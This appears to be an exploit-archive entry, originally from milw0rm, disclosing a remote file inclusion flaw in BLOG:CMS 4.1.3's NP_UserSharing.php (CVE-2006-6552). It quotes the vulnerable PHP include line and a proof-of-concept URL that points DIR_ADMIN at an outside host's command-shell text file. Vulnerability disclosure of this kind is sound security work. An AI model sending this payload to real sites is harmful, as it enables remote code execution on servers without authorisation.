Blog:CMS 4.1.3 - 'NP_UserSharing.php' Remote File Inclusion
| EKU-ID: 10908 | CVE: OSVDB-32258;CVE-2006-6552;OSVDB-32068 | OSVDB-ID: |
| Author: HACKERS PAL | Published: 2006-12-12 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 10908 | CVE: OSVDB-32258;CVE-2006-6552;OSVDB-32068 | OSVDB-ID: |
| Author: HACKERS PAL | Published: 2006-12-12 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
BLOG:CMS Remote file include Vulnerability Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : security@soqor.net global $DIR_ADMIN; include ( substr($DIR_ADMIN,0,strpos($DIR_ADMIN,'admin'))."photo".DIRECTORY_SEPARATOR."includes".DIRECTORY_SEPARATOR."user.class.php"); http://site.com/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=http://www.soqor.net/tools/cmd.txt?admin # milw0rm.com [2006-12-12]